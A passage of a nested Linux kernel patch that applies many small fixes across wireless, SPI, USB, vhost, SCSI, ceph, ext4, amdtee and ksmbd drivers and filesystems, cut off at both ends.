++		if (vif->type != NL80211_IFTYPE_STATION) {
++			count = 0;
++			break;
++		}
++
++		count++;
++		found_vif = vif;
++	}
++
++	if (count == 1 && found_vif->cfg.ps) {
++		rtwdev->lps_enabled = true;
++	} else {
++		rtw89_leave_lps(rtwdev);
++		rtwdev->lps_enabled = false;
++	}
++}
+diff --git a/drivers/net/wireless/realtek/rtw89/ps.h b/drivers/net/wireless/realtek/rtw89/ps.h
+index 0feae39916238..49fb9d8b65466 100644
+--- a/drivers/net/wireless/realtek/rtw89/ps.h
++++ b/drivers/net/wireless/realtek/rtw89/ps.h
+@@ -13,5 +13,6 @@ void rtw89_enter_ips(struct rtw89_dev *rtwdev);
+ void rtw89_leave_ips(struct rtw89_dev *rtwdev);
+ void rtw89_set_coex_ctrl_lps(struct rtw89_dev *rtwdev, bool btc_ctrl);
+ void rtw89_process_p2p_ps(struct rtw89_dev *rtwdev, struct ieee80211_vif *vif);
++void rtw89_recalc_lps(struct rtw89_dev *rtwdev);
+ 
+ #endif
+diff --git a/drivers/pinctrl/meson/pinctrl-meson-axg.c b/drivers/pinctrl/meson/pinctrl-meson-axg.c
+index 7bfecdfba1779..d249a035c2b9b 100644
+--- a/drivers/pinctrl/meson/pinctrl-meson-axg.c
++++ b/drivers/pinctrl/meson/pinctrl-meson-axg.c
+@@ -400,6 +400,7 @@ static struct meson_pmx_group meson_axg_periphs_groups[] = {
+ 	GPIO_GROUP(GPIOA_15),
+ 	GPIO_GROUP(GPIOA_16),
+ 	GPIO_GROUP(GPIOA_17),
++	GPIO_GROUP(GPIOA_18),
+ 	GPIO_GROUP(GPIOA_19),
+ 	GPIO_GROUP(GPIOA_20),
+ 
+diff --git a/drivers/platform/surface/aggregator/controller.c b/drivers/platform/surface/aggregator/controller.c
+index c6537a1b3a2ec..30cea324ff95f 100644
+--- a/drivers/platform/surface/aggregator/controller.c
++++ b/drivers/platform/surface/aggregator/controller.c
+@@ -825,7 +825,7 @@ static int ssam_cplt_init(struct ssam_cplt *cplt, struct device *dev)
+ 
+ 	cplt->dev = dev;
+ 
+-	cplt->wq = create_workqueue(SSAM_CPLT_WQ_NAME);
++	cplt->wq = alloc_workqueue(SSAM_CPLT_WQ_NAME, WQ_UNBOUND | WQ_MEM_RECLAIM, 0);
+ 	if (!cplt->wq)
+ 		return -ENOMEM;
+ 
+diff --git a/drivers/platform/surface/surface_aggregator_tabletsw.c b/drivers/platform/surface/surface_aggregator_tabletsw.c
+index 27d95a6a78513..af8b547cffdc6 100644
+--- a/drivers/platform/surface/surface_aggregator_tabletsw.c
++++ b/drivers/platform/surface/surface_aggregator_tabletsw.c
+@@ -201,6 +201,7 @@ enum ssam_kip_cover_state {
+ 	SSAM_KIP_COVER_STATE_LAPTOP        = 0x03,
+ 	SSAM_KIP_COVER_STATE_FOLDED_CANVAS = 0x04,
+ 	SSAM_KIP_COVER_STATE_FOLDED_BACK   = 0x05,
++	SSAM_KIP_COVER_STATE_BOOK          = 0x06,
+ };
+ 
+ static const char *ssam_kip_cover_state_name(struct ssam_tablet_sw *sw, u32 state)
+@@ -221,6 +222,9 @@ static const char *ssam_kip_cover_state_name(struct ssam_tablet_sw *sw, u32 stat
+ 	case SSAM_KIP_COVER_STATE_FOLDED_BACK:
+ 		return "folded-back";
+ 
++	case SSAM_KIP_COVER_STATE_BOOK:
++		return "book";
++
+ 	default:
+ 		dev_warn(&sw->sdev->dev, "unknown KIP cover state: %u\n", state);
+ 		return "<unknown>";
+@@ -233,6 +237,7 @@ static bool ssam_kip_cover_state_is_tablet_mode(struct ssam_tablet_sw *sw, u32 s
+ 	case SSAM_KIP_COVER_STATE_DISCONNECTED:
+ 	case SSAM_KIP_COVER_STATE_FOLDED_CANVAS:
+ 	case SSAM_KIP_COVER_STATE_FOLDED_BACK:
++	case SSAM_KIP_COVER_STATE_BOOK:
+ 		return true;
+ 
+ 	case SSAM_KIP_COVER_STATE_CLOSED:
+diff --git a/drivers/s390/block/dasd_ioctl.c b/drivers/s390/block/dasd_ioctl.c
+index 9327dcdd6e5e4..8fca725b3daec 100644
+--- a/drivers/s390/block/dasd_ioctl.c
++++ b/drivers/s390/block/dasd_ioctl.c
+@@ -552,10 +552,10 @@ static int __dasd_ioctl_information(struct dasd_block *block,
+ 
+ 	memcpy(dasd_info->type, base->discipline->name, 4);
+ 
+-	spin_lock_irqsave(&block->queue_lock, flags);
++	spin_lock_irqsave(get_ccwdev_lock(base->cdev), flags);
+ 	list_for_each(l, &base->ccw_queue)
+ 		dasd_info->chanq_len++;
+-	spin_unlock_irqrestore(&block->queue_lock, flags);
++	spin_unlock_irqrestore(get_ccwdev_lock(base->cdev), flags);
+ 	return 0;
+ }
+ 
+diff --git a/drivers/scsi/megaraid/megaraid_sas_fusion.c b/drivers/scsi/megaraid/megaraid_sas_fusion.c
+index af22ffa8f6a25..1475f3e259c10 100644
+--- a/drivers/scsi/megaraid/megaraid_sas_fusion.c
++++ b/drivers/scsi/megaraid/megaraid_sas_fusion.c
+@@ -3323,7 +3323,7 @@ static void megasas_prepare_secondRaid1_IO(struct megasas_instance *instance,
+ 	/* copy the io request frame as well as 8 SGEs data for r1 command*/
+ 	memcpy(r1_cmd->io_request, cmd->io_request,
+ 	       (sizeof(struct MPI2_RAID_SCSI_IO_REQUEST)));
+-	memcpy(&r1_cmd->io_request->SGL, &cmd->io_request->SGL,
++	memcpy(r1_cmd->io_request->SGLs, cmd->io_request->SGLs,
+ 	       (fusion->max_sge_in_main_msg * sizeof(union MPI2_SGE_IO_UNION)));
+ 	/*sense buffer is different for r1 command*/
+ 	r1_cmd->io_request->SenseBufferLowAddress =
+diff --git a/drivers/scsi/megaraid/megaraid_sas_fusion.h b/drivers/scsi/megaraid/megaraid_sas_fusion.h
+index 49e9a9048ee7e..b677d80e58747 100644
+--- a/drivers/scsi/megaraid/megaraid_sas_fusion.h
++++ b/drivers/scsi/megaraid/megaraid_sas_fusion.h
+@@ -526,7 +526,10 @@ struct MPI2_RAID_SCSI_IO_REQUEST {
+ 	__le32			Control;                        /* 0x3C */
+ 	union MPI2_SCSI_IO_CDB_UNION  CDB;			/* 0x40 */
+ 	union RAID_CONTEXT_UNION RaidContext;  /* 0x60 */
+-	union MPI2_SGE_IO_UNION       SGL;			/* 0x80 */
++	union {
++		union MPI2_SGE_IO_UNION       SGL;		/* 0x80 */
++		DECLARE_FLEX_ARRAY(union MPI2_SGE_IO_UNION, SGLs);
++	};
+ };
+ 
+ /*
+diff --git a/drivers/soc/qcom/icc-bwmon.c b/drivers/soc/qcom/icc-bwmon.c
+index d07be3700db60..7829549993c92 100644
+--- a/drivers/soc/qcom/icc-bwmon.c
++++ b/drivers/soc/qcom/icc-bwmon.c
+@@ -603,12 +603,12 @@ static int bwmon_probe(struct platform_device *pdev)
+ 	bwmon->max_bw_kbps = UINT_MAX;
+ 	opp = dev_pm_opp_find_bw_floor(dev, &bwmon->max_bw_kbps, 0);
+ 	if (IS_ERR(opp))
+-		return dev_err_probe(dev, ret, "failed to find max peak bandwidth\n");
++		return dev_err_probe(dev, PTR_ERR(opp), "failed to find max peak bandwidth\n");
+ 
+ 	bwmon->min_bw_kbps = 0;
+ 	opp = dev_pm_opp_find_bw_ceil(dev, &bwmon->min_bw_kbps, 0);
+ 	if (IS_ERR(opp))
+-		return dev_err_probe(dev, ret, "failed to find min peak bandwidth\n");
++		return dev_err_probe(dev, PTR_ERR(opp), "failed to find min peak bandwidth\n");
+ 
+ 	bwmon->dev = dev;
+ 
+diff --git a/drivers/soundwire/stream.c b/drivers/soundwire/stream.c
+index bd502368339e5..b10ea69a638e1 100644
+--- a/drivers/soundwire/stream.c
++++ b/drivers/soundwire/stream.c
+@@ -2019,8 +2019,10 @@ int sdw_stream_add_slave(struct sdw_slave *slave,
+ 
+ skip_alloc_master_rt:
+ 	s_rt = sdw_slave_rt_find(slave, stream);
+-	if (s_rt)
++	if (s_rt) {
++		alloc_slave_rt = false;
+ 		goto skip_alloc_slave_rt;
++	}
+ 
+ 	s_rt = sdw_slave_rt_alloc(slave, m_rt);
+ 	if (!s_rt) {
+diff --git a/drivers/spi/spi-mt65xx.c b/drivers/spi/spi-mt65xx.c
+index 9eab6c20dbc56..6e95efb50acbc 100644
+--- a/drivers/spi/spi-mt65xx.c
++++ b/drivers/spi/spi-mt65xx.c
+@@ -1275,6 +1275,9 @@ static int mtk_spi_remove(struct platform_device *pdev)
+ 	struct mtk_spi *mdata = spi_master_get_devdata(master);
+ 	int ret;
+ 
++	if (mdata->use_spimem && !completion_done(&mdata->spimem_done))
++		complete(&mdata->spimem_done);
++
+ 	ret = pm_runtime_resume_and_get(&pdev->dev);
+ 	if (ret < 0)
+ 		return ret;
+diff --git a/drivers/spi/spi-qup.c b/drivers/spi/spi-qup.c
+index 205e54f157b4a..fb6b7738b4f55 100644
+--- a/drivers/spi/spi-qup.c
++++ b/drivers/spi/spi-qup.c
+@@ -1029,23 +1029,8 @@ static int spi_qup_probe(struct platform_device *pdev)
+ 		return -ENXIO;
+ 	}
+ 
+-	ret = clk_prepare_enable(cclk);
+-	if (ret) {
+-		dev_err(dev, "cannot enable core clock\n");
+-		return ret;
+-	}
+-
+-	ret = clk_prepare_enable(iclk);
+-	if (ret) {
+-		clk_disable_unprepare(cclk);
+-		dev_err(dev, "cannot enable iface clock\n");
+-		return ret;
+-	}
+-
+ 	master = spi_alloc_master(dev, sizeof(struct spi_qup));
+ 	if (!master) {
+-		clk_disable_unprepare(cclk);
+-		clk_disable_unprepare(iclk);
+ 		dev_err(dev, "cannot allocate master\n");
+ 		return -ENOMEM;
+ 	}
+@@ -1093,6 +1078,19 @@ static int spi_qup_probe(struct platform_device *pdev)
+ 	spin_lock_init(&controller->lock);
+ 	init_completion(&controller->done);
+ 
++	ret = clk_prepare_enable(cclk);
++	if (ret) {
++		dev_err(dev, "cannot enable core clock\n");
++		goto error_dma;
++	}
++
++	ret = clk_prepare_enable(iclk);
++	if (ret) {
++		clk_disable_unprepare(cclk);
++		dev_err(dev, "cannot enable iface clock\n");
++		goto error_dma;
++	}
++
+ 	iomode = readl_relaxed(base + QUP_IO_M_MODES);
+ 
+ 	size = QUP_IO_M_OUTPUT_BLOCK_SIZE(iomode);
+@@ -1122,7 +1120,7 @@ static int spi_qup_probe(struct platform_device *pdev)
+ 	ret = spi_qup_set_state(controller, QUP_STATE_RESET);
+ 	if (ret) {
+ 		dev_err(dev, "cannot set RESET state\n");
+-		goto error_dma;
++		goto error_clk;
+ 	}
+ 
+ 	writel_relaxed(0, base + QUP_OPERATIONAL);
+@@ -1146,7 +1144,7 @@ static int spi_qup_probe(struct platform_device *pdev)
+ 	ret = devm_request_irq(dev, irq, spi_qup_qup_irq,
+ 			       IRQF_TRIGGER_HIGH, pdev->name, controller);
+ 	if (ret)
+-		goto error_dma;
++		goto error_clk;
+ 
+ 	pm_runtime_set_autosuspend_delay(dev, MSEC_PER_SEC);
+ 	pm_runtime_use_autosuspend(dev);
+@@ -1161,11 +1159,12 @@ static int spi_qup_probe(struct platform_device *pdev)
+ 
+ disable_pm:
+ 	pm_runtime_disable(&pdev->dev);
++error_clk:
++	clk_disable_unprepare(cclk);
++	clk_disable_unprepare(iclk);
+ error_dma:
+ 	spi_qup_release_dma(master);
+ error:
+-	clk_disable_unprepare(cclk);
+-	clk_disable_unprepare(iclk);
+ 	spi_master_put(master);
+ 	return ret;
+ }
+diff --git a/drivers/staging/rtl8192e/rtl8192e/rtl_core.c b/drivers/staging/rtl8192e/rtl8192e/rtl_core.c
+index 7e11364d718bf..c1e50084172d8 100644
+--- a/drivers/staging/rtl8192e/rtl8192e/rtl_core.c
++++ b/drivers/staging/rtl8192e/rtl8192e/rtl_core.c
+@@ -48,9 +48,9 @@ static const struct rtl819x_ops rtl819xp_ops = {
+ };
+ 
+ static struct pci_device_id rtl8192_pci_id_tbl[] = {
+-	{PCI_DEVICE(0x10ec, 0x8192)},
+-	{PCI_DEVICE(0x07aa, 0x0044)},
+-	{PCI_DEVICE(0x07aa, 0x0047)},
++	{RTL_PCI_DEVICE(0x10ec, 0x8192, rtl819xp_ops)},
++	{RTL_PCI_DEVICE(0x07aa, 0x0044, rtl819xp_ops)},
++	{RTL_PCI_DEVICE(0x07aa, 0x0047, rtl819xp_ops)},
+ 	{}
+ };
+ 
+diff --git a/drivers/staging/rtl8192e/rtl8192e/rtl_core.h b/drivers/staging/rtl8192e/rtl8192e/rtl_core.h
+index 50f1ec78cc457..7021f9c435d96 100644
+--- a/drivers/staging/rtl8192e/rtl8192e/rtl_core.h
++++ b/drivers/staging/rtl8192e/rtl8192e/rtl_core.h
+@@ -55,6 +55,11 @@
+ #define IS_HARDWARE_TYPE_8192SE(_priv)		\
+ 	(((struct r8192_priv *)rtllib_priv(dev))->card_8192 == NIC_8192SE)
+ 
++#define RTL_PCI_DEVICE(vend, dev, cfg) \
++	.vendor = (vend), .device = (dev), \
++	.subvendor = PCI_ANY_ID, .subdevice = PCI_ANY_ID, \
++	.driver_data = (kernel_ulong_t)&(cfg)
++
+ #define TOTAL_CAM_ENTRY		32
+ #define CAM_CONTENT_COUNT	8
+ 
+diff --git a/drivers/tee/amdtee/amdtee_if.h b/drivers/tee/amdtee/amdtee_if.h
+index ff48c3e473750..e2014e21530ac 100644
+--- a/drivers/tee/amdtee/amdtee_if.h
++++ b/drivers/tee/amdtee/amdtee_if.h
+@@ -118,16 +118,18 @@ struct tee_cmd_unmap_shared_mem {
+ 
+ /**
+  * struct tee_cmd_load_ta - load Trusted Application (TA) binary into TEE
+- * @low_addr:    [in] bits [31:0] of the physical address of the TA binary
+- * @hi_addr:     [in] bits [63:32] of the physical address of the TA binary
+- * @size:        [in] size of TA binary in bytes
+- * @ta_handle:   [out] return handle of the loaded TA
++ * @low_addr:       [in] bits [31:0] of the physical address of the TA binary
++ * @hi_addr:        [in] bits [63:32] of the physical address of the TA binary
++ * @size:           [in] size of TA binary in bytes
++ * @ta_handle:      [out] return handle of the loaded TA
++ * @return_origin:  [out] origin of return code after TEE processing
+  */
+ struct tee_cmd_load_ta {
+ 	u32 low_addr;
+ 	u32 hi_addr;
+ 	u32 size;
+ 	u32 ta_handle;
++	u32 return_origin;
+ };
+ 
+ /**
+diff --git a/drivers/tee/amdtee/call.c b/drivers/tee/amdtee/call.c
+index cec6e70f0ac92..8a02c5fe33a6b 100644
+--- a/drivers/tee/amdtee/call.c
++++ b/drivers/tee/amdtee/call.c
+@@ -423,19 +423,23 @@ int handle_load_ta(void *data, u32 size, struct tee_ioctl_open_session_arg *arg)
+ 	if (ret) {
+ 		arg->ret_origin = TEEC_ORIGIN_COMMS;
+ 		arg->ret = TEEC_ERROR_COMMUNICATION;
+-	} else if (arg->ret == TEEC_SUCCESS) {
+-		ret = get_ta_refcount(load_cmd.ta_handle);
+-		if (!ret) {
+-			arg->ret_origin = TEEC_ORIGIN_COMMS;
+-			arg->ret = TEEC_ERROR_OUT_OF_MEMORY;
+-
+-			/* Unload the TA on error */
+-			unload_cmd.ta_handle = load_cmd.ta_handle;
+-			psp_tee_process_cmd(TEE_CMD_ID_UNLOAD_TA,
+-					    (void *)&unload_cmd,
+-					    sizeof(unload_cmd), &ret);
+-		} else {
+-			set_session_id(load_cmd.ta_handle, 0, &arg->session);
++	} else {
++		arg->ret_origin = load_cmd.return_origin;
++
++		if (arg->ret == TEEC_SUCCESS) {
++			ret = get_ta_refcount(load_cmd.ta_handle);
++			if (!ret) {
++				arg->ret_origin = TEEC_ORIGIN_COMMS;
++				arg->ret = TEEC_ERROR_OUT_OF_MEMORY;
++
++				/* Unload the TA on error */
++				unload_cmd.ta_handle = load_cmd.ta_handle;
++				psp_tee_process_cmd(TEE_CMD_ID_UNLOAD_TA,
++						    (void *)&unload_cmd,
++						    sizeof(unload_cmd), &ret);
++			} else {
++				set_session_id(load_cmd.ta_handle, 0, &arg->session);
++			}
+ 		}
+ 	}
+ 	mutex_unlock(&ta_refcount_mutex);
+diff --git a/drivers/usb/core/buffer.c b/drivers/usb/core/buffer.c
+index fbb087b728dc9..268ccbec88f95 100644
+--- a/drivers/usb/core/buffer.c
++++ b/drivers/usb/core/buffer.c
+@@ -172,3 +172,44 @@ void hcd_buffer_free(
+ 	}
+ 	dma_free_coherent(hcd->self.sysdev, size, addr, dma);
+ }
++
++void *hcd_buffer_alloc_pages(struct usb_hcd *hcd,
++		size_t size, gfp_t mem_flags, dma_addr_t *dma)
++{
++	if (size == 0)
++		return NULL;
++
++	if (hcd->localmem_pool)
++		return gen_pool_dma_alloc_align(hcd->localmem_pool,
++				size, dma, PAGE_SIZE);
++
++	/* some USB hosts just use PIO */
++	if (!hcd_uses_dma(hcd)) {
++		*dma = DMA_MAPPING_ERROR;
++		return (void *)__get_free_pages(mem_flags,
++				get_order(size));
++	}
++
++	return dma_alloc_coherent(hcd->self.sysdev,
++			size, dma, mem_flags);
++}
++
++void hcd_buffer_free_pages(struct usb_hcd *hcd,
++		size_t size, void *addr, dma_addr_t dma)
++{
++	if (!addr)
++		return;
++
++	if (hcd->localmem_pool) {
++		gen_pool_free(hcd->localmem_pool,
++				(unsigned long)addr, size);
++		return;
++	}
++
++	if (!hcd_uses_dma(hcd)) {
++		free_pages((unsigned long)addr, get_order(size));
++		return;
++	}
++
++	dma_free_coherent(hcd->self.sysdev, size, addr, dma);
++}
+diff --git a/drivers/usb/core/devio.c b/drivers/usb/core/devio.c
+index 837f3e57f5809..984de3f5e8eb9 100644
+--- a/drivers/usb/core/devio.c
++++ b/drivers/usb/core/devio.c
+@@ -186,6 +186,7 @@ static int connected(struct usb_dev_state *ps)
+ static void dec_usb_memory_use_count(struct usb_memory *usbm, int *count)
+ {
+ 	struct usb_dev_state *ps = usbm->ps;
++	struct usb_hcd *hcd = bus_to_hcd(ps->dev->bus);
+ 	unsigned long flags;
+ 
+ 	spin_lock_irqsave(&ps->lock, flags);
+@@ -194,8 +195,8 @@ static void dec_usb_memory_use_count(struct usb_memory *usbm, int *count)
+ 		list_del(&usbm->memlist);
+ 		spin_unlock_irqrestore(&ps->lock, flags);
+ 
+-		usb_free_coherent(ps->dev, usbm->size, usbm->mem,
+-				usbm->dma_handle);
++		hcd_buffer_free_pages(hcd, usbm->size,
++				usbm->mem, usbm->dma_handle);
+ 		usbfs_decrease_memory_usage(
+ 			usbm->size + sizeof(struct usb_memory));
+ 		kfree(usbm);
+@@ -234,7 +235,7 @@ static int usbdev_mmap(struct file *file, struct vm_area_struct *vma)
+ 	size_t size = vma->vm_end - vma->vm_start;
+ 	void *mem;
+ 	unsigned long flags;
+-	dma_addr_t dma_handle;
++	dma_addr_t dma_handle = DMA_MAPPING_ERROR;
+ 	int ret;
+ 
+ 	ret = usbfs_increase_memory_usage(size + sizeof(struct usb_memory));
+@@ -247,8 +248,8 @@ static int usbdev_mmap(struct file *file, struct vm_area_struct *vma)
+ 		goto error_decrease_mem;
+ 	}
+ 
+-	mem = usb_alloc_coherent(ps->dev, size, GFP_USER | __GFP_NOWARN,
+-			&dma_handle);
++	mem = hcd_buffer_alloc_pages(hcd,
++			size, GFP_USER | __GFP_NOWARN, &dma_handle);
+ 	if (!mem) {
+ 		ret = -ENOMEM;
+ 		goto error_free_usbm;
+@@ -264,7 +265,14 @@ static int usbdev_mmap(struct file *file, struct vm_area_struct *vma)
+ 	usbm->vma_use_count = 1;
+ 	INIT_LIST_HEAD(&usbm->memlist);
+ 
+-	if (hcd->localmem_pool || !hcd_uses_dma(hcd)) {
++	/*
++	 * In DMA-unavailable cases, hcd_buffer_alloc_pages allocates
++	 * normal pages and assigns DMA_MAPPING_ERROR to dma_handle. Check
++	 * whether we are in such cases, and then use remap_pfn_range (or
++	 * dma_mmap_coherent) to map normal (or DMA) pages into the user
++	 * space, respectively.
++	 */
++	if (dma_handle == DMA_MAPPING_ERROR) {
+ 		if (remap_pfn_range(vma, vma->vm_start,
+ 				    virt_to_phys(usbm->mem) >> PAGE_SHIFT,
+ 				    size, vma->vm_page_prot) < 0) {
+diff --git a/drivers/vdpa/vdpa_user/vduse_dev.c b/drivers/vdpa/vdpa_user/vduse_dev.c
+index 31017ebc4d7c7..72f924ec4658d 100644
+--- a/drivers/vdpa/vdpa_user/vduse_dev.c
++++ b/drivers/vdpa/vdpa_user/vduse_dev.c
+@@ -1443,6 +1443,9 @@ static bool vduse_validate_config(struct vduse_dev_config *config)
+ 	if (config->vq_num > 0xffff)
+ 		return false;
+ 
++	if (!config->name[0])
++		return false;
++
+ 	if (!device_is_allowed(config->device_id))
+ 		return false;
+ 
+diff --git a/drivers/vhost/vdpa.c b/drivers/vhost/vdpa.c
+index 6f532da59e08a..d591f77961aa8 100644
+--- a/drivers/vhost/vdpa.c
++++ b/drivers/vhost/vdpa.c
+@@ -549,7 +549,14 @@ static long vhost_vdpa_vring_ioctl(struct vhost_vdpa *v, unsigned int cmd,
+ 		if (r)
+ 			return r;
+ 
+-		vq->last_avail_idx = vq_state.split.avail_index;
++		if (vhost_has_feature(vq, VIRTIO_F_RING_PACKED)) {
++			vq->last_avail_idx = vq_state.packed.last_avail_idx |
++					     (vq_state.packed.last_avail_counter << 15);
++			vq->last_used_idx = vq_state.packed.last_used_idx |
++					    (vq_state.packed.last_used_counter << 15);
++		} else {
++			vq->last_avail_idx = vq_state.split.avail_index;
++		}
+ 		break;
+ 	}
+ 
+@@ -567,9 +574,15 @@ static long vhost_vdpa_vring_ioctl(struct vhost_vdpa *v, unsigned int cmd,
+ 		break;
+ 
+ 	case VHOST_SET_VRING_BASE:
+-		vq_state.split.avail_index = vq->last_avail_idx;
+-		if (ops->set_vq_state(vdpa, idx, &vq_state))
+-			r = -EINVAL;
++		if (vhost_has_feature(vq, VIRTIO_F_RING_PACKED)) {
++			vq_state.packed.last_avail_idx = vq->last_avail_idx & 0x7fff;
++			vq_state.packed.last_avail_counter = !!(vq->last_avail_idx & 0x8000);
++			vq_state.packed.last_used_idx = vq->last_used_idx & 0x7fff;
++			vq_state.packed.last_used_counter = !!(vq->last_used_idx & 0x8000);
++		} else {
++			vq_state.split.avail_index = vq->last_avail_idx;
++		}
++		r = ops->set_vq_state(vdpa, idx, &vq_state);
+ 		break;
+ 
+ 	case VHOST_SET_VRING_CALL:
+diff --git a/drivers/vhost/vhost.c b/drivers/vhost/vhost.c
+index 43c9770b86e5a..1a059b028c501 100644
+--- a/drivers/vhost/vhost.c
++++ b/drivers/vhost/vhost.c
+@@ -1633,17 +1633,25 @@ long vhost_vring_ioctl(struct vhost_dev *d, unsigned int ioctl, void __user *arg
+ 			r = -EFAULT;
+ 			break;
+ 		}
+-		if (s.num > 0xffff) {
+-			r = -EINVAL;
+-			break;
++		if (vhost_has_feature(vq, VIRTIO_F_RING_PACKED)) {
++			vq->last_avail_idx = s.num & 0xffff;
++			vq->last_used_idx = (s.num >> 16) & 0xffff;
++		} else {
++			if (s.num > 0xffff) {
++				r = -EINVAL;
++				break;
++			}
++			vq->last_avail_idx = s.num;
+ 		}
+-		vq->last_avail_idx = s.num;
+ 		/* Forget the cached index value. */
+ 		vq->avail_idx = vq->last_avail_idx;
+ 		break;
+ 	case VHOST_GET_VRING_BASE:
+ 		s.index = idx;
+-		s.num = vq->last_avail_idx;
++		if (vhost_has_feature(vq, VIRTIO_F_RING_PACKED))
++			s.num = (u32)vq->last_avail_idx | ((u32)vq->last_used_idx << 16);
++		else
++			s.num = vq->last_avail_idx;
+ 		if (copy_to_user(argp, &s, sizeof s))
+ 			r = -EFAULT;
+ 		break;
+diff --git a/drivers/vhost/vhost.h b/drivers/vhost/vhost.h
+index 790b296271f1e..5e17c4aa73745 100644
+--- a/drivers/vhost/vhost.h
++++ b/drivers/vhost/vhost.h
+@@ -85,13 +85,17 @@ struct vhost_virtqueue {
+ 	/* The routine to call when the Guest pings us, or timeout. */
+ 	vhost_work_fn_t handle_kick;
+ 
+-	/* Last available index we saw. */
++	/* Last available index we saw.
++	 * Values are limited to 0x7fff, and the high bit is used as
++	 * a wrap counter when using VIRTIO_F_RING_PACKED. */
+ 	u16 last_avail_idx;
+ 
+ 	/* Caches available index value from user. */
+ 	u16 avail_idx;
+ 
+-	/* Last index we used. */
++	/* Last index we used.
++	 * Values are limited to 0x7fff, and the high bit is used as
++	 * a wrap counter when using VIRTIO_F_RING_PACKED. */
+ 	u16 last_used_idx;
+ 
+ 	/* Used flags */
+diff --git a/fs/afs/dir.c b/fs/afs/dir.c
+index f73b2f62afaae..07dc4ec73520c 100644
+--- a/fs/afs/dir.c
++++ b/fs/afs/dir.c
+@@ -1357,6 +1357,7 @@ static int afs_mkdir(struct user_namespace *mnt_userns, struct inode *dir,
+ 	op->dentry	= dentry;
+ 	op->create.mode	= S_IFDIR | mode;
+ 	op->create.reason = afs_edit_dir_for_mkdir;
++	op->mtime	= current_time(dir);
+ 	op->ops		= &afs_mkdir_operation;
+ 	return afs_do_sync_operation(op);
+ }
+@@ -1660,6 +1661,7 @@ static int afs_create(struct user_namespace *mnt_userns, struct inode *dir,
+ 	op->dentry	= dentry;
+ 	op->create.mode	= S_IFREG | mode;
+ 	op->create.reason = afs_edit_dir_for_create;
++	op->mtime	= current_time(dir);
+ 	op->ops		= &afs_create_operation;
+ 	return afs_do_sync_operation(op);
+ 
+@@ -1795,6 +1797,7 @@ static int afs_symlink(struct user_namespace *mnt_userns, struct inode *dir,
+ 	op->ops			= &afs_symlink_operation;
+ 	op->create.reason	= afs_edit_dir_for_symlink;
+ 	op->create.symlink	= content;
++	op->mtime		= current_time(dir);
+ 	return afs_do_sync_operation(op);
+ 
+ error:
+diff --git a/fs/ceph/caps.c b/fs/ceph/caps.c
+index faf1178021123..cdb26aadae125 100644
+--- a/fs/ceph/caps.c
++++ b/fs/ceph/caps.c
+@@ -1626,6 +1626,7 @@ void ceph_flush_snaps(struct ceph_inode_info *ci,
+ 	struct inode *inode = &ci->netfs.inode;
+ 	struct ceph_mds_client *mdsc = ceph_inode_to_client(inode)->mdsc;
+ 	struct ceph_mds_session *session = NULL;
++	bool need_put = false;
+ 	int mds;
+ 
+ 	dout("ceph_flush_snaps %p\n", inode);
+@@ -1670,8 +1671,13 @@ out:
+ 		ceph_put_mds_session(session);
+ 	/* we flushed them all; remove this inode from the queue */
+ 	spin_lock(&mdsc->snap_flush_lock);
++	if (!list_empty(&ci->i_snap_flush_item))
++		need_put = true;
+ 	list_del_init(&ci->i_snap_flush_item);
+ 	spin_unlock(&mdsc->snap_flush_lock);
++
++	if (need_put)
++		iput(inode);
+ }
+ 
+ /*
+diff --git a/fs/ceph/snap.c b/fs/ceph/snap.c
+index 0b236ebd989fc..2e73ba62bd7aa 100644
+--- a/fs/ceph/snap.c
++++ b/fs/ceph/snap.c
+@@ -693,8 +693,10 @@ int __ceph_finish_cap_snap(struct ceph_inode_info *ci,
+ 	     capsnap->size);
+ 
+ 	spin_lock(&mdsc->snap_flush_lock);
+-	if (list_empty(&ci->i_snap_flush_item))
++	if (list_empty(&ci->i_snap_flush_item)) {
++		ihold(inode);
+ 		list_add_tail(&ci->i_snap_flush_item, &mdsc->snap_flush_list);
++	}
+ 	spin_unlock(&mdsc->snap_flush_lock);
+ 	return 1;  /* caller may want to ceph_flush_snaps */
+ }
+diff --git a/fs/ext4/super.c b/fs/ext4/super.c
+index 5db1060b8684f..760249d9152d1 100644
+--- a/fs/ext4/super.c
++++ b/fs/ext4/super.c
+@@ -6341,7 +6341,6 @@ static int __ext4_remount(struct fs_context *fc, struct super_block *sb)
+ 	struct ext4_mount_options old_opts;
+ 	ext4_group_t g;
+ 	int err = 0;
+-	int enable_rw = 0;
+ #ifdef CONFIG_QUOTA
+ 	int enable_quota = 0;
+ 	int i, j;
+@@ -6528,7 +6527,7 @@ static int __ext4_remount(struct fs_context *fc, struct super_block *sb)
+ 			if (err)
+ 				goto restore_opts;
+ 
+-			enable_rw = 1;
++			sb->s_flags &= ~SB_RDONLY;
+ 			if (ext4_has_feature_mmp(sb)) {
+ 				err = ext4_multi_mount_protect(sb,
+ 						le64_to_cpu(es->s_mmp_block));
+@@ -6575,9 +6574,6 @@ static int __ext4_remount(struct fs_context *fc, struct super_block *sb)
+ 	if (!test_opt(sb, BLOCK_VALIDITY) && sbi->s_system_blks)
+ 		ext4_release_system_zone(sb);
+ 
+-	if (enable_rw)
+-		sb->s_flags &= ~SB_RDONLY;
+-
+ 	/*
+ 	 * Reinitialize lazy itable initialization thread based on
+ 	 * current settings
+diff --git a/fs/ext4/xattr.c b/fs/ext4/xattr.c
+index fddde5045d0c8..51d642a95bd29 100644
+--- a/fs/ext4/xattr.c
++++ b/fs/ext4/xattr.c
+@@ -2006,8 +2006,9 @@ inserted:
+ 			else {
+ 				u32 ref;
+ 
++#ifdef EXT4_XATTR_DEBUG
+ 				WARN_ON_ONCE(dquot_initialize_needed(inode));
+-
++#endif
+ 				/* The old block is released after updating
+ 				   the inode. */
+ 				error = dquot_alloc_block(inode,
+@@ -2070,8 +2071,9 @@ inserted:
+ 			/* We need to allocate a new block */
+ 			ext4_fsblk_t goal, block;
+ 
++#ifdef EXT4_XATTR_DEBUG
+ 			WARN_ON_ONCE(dquot_initialize_needed(inode));
+-
++#endif
+ 			goal = ext4_group_first_block_no(sb,
+ 						EXT4_I(inode)->i_block_group);
+ 			block = ext4_new_meta_blocks(handle, inode, goal, 0,
+diff --git a/fs/ksmbd/connection.c b/fs/ksmbd/connection.c
+index b371754540f9c..bf8531b80a182 100644
+--- a/fs/ksmbd/connection.c
++++ b/fs/ksmbd/connection.c
+@@ -296,6 +296,9 @@ bool ksmbd_conn_alive(struct ksmbd_conn *conn)
+ 	return true;
+ }
+ 
++#define SMB1_MIN_SUPPORTED_HEADER_SIZE (sizeof(struct smb_hdr))
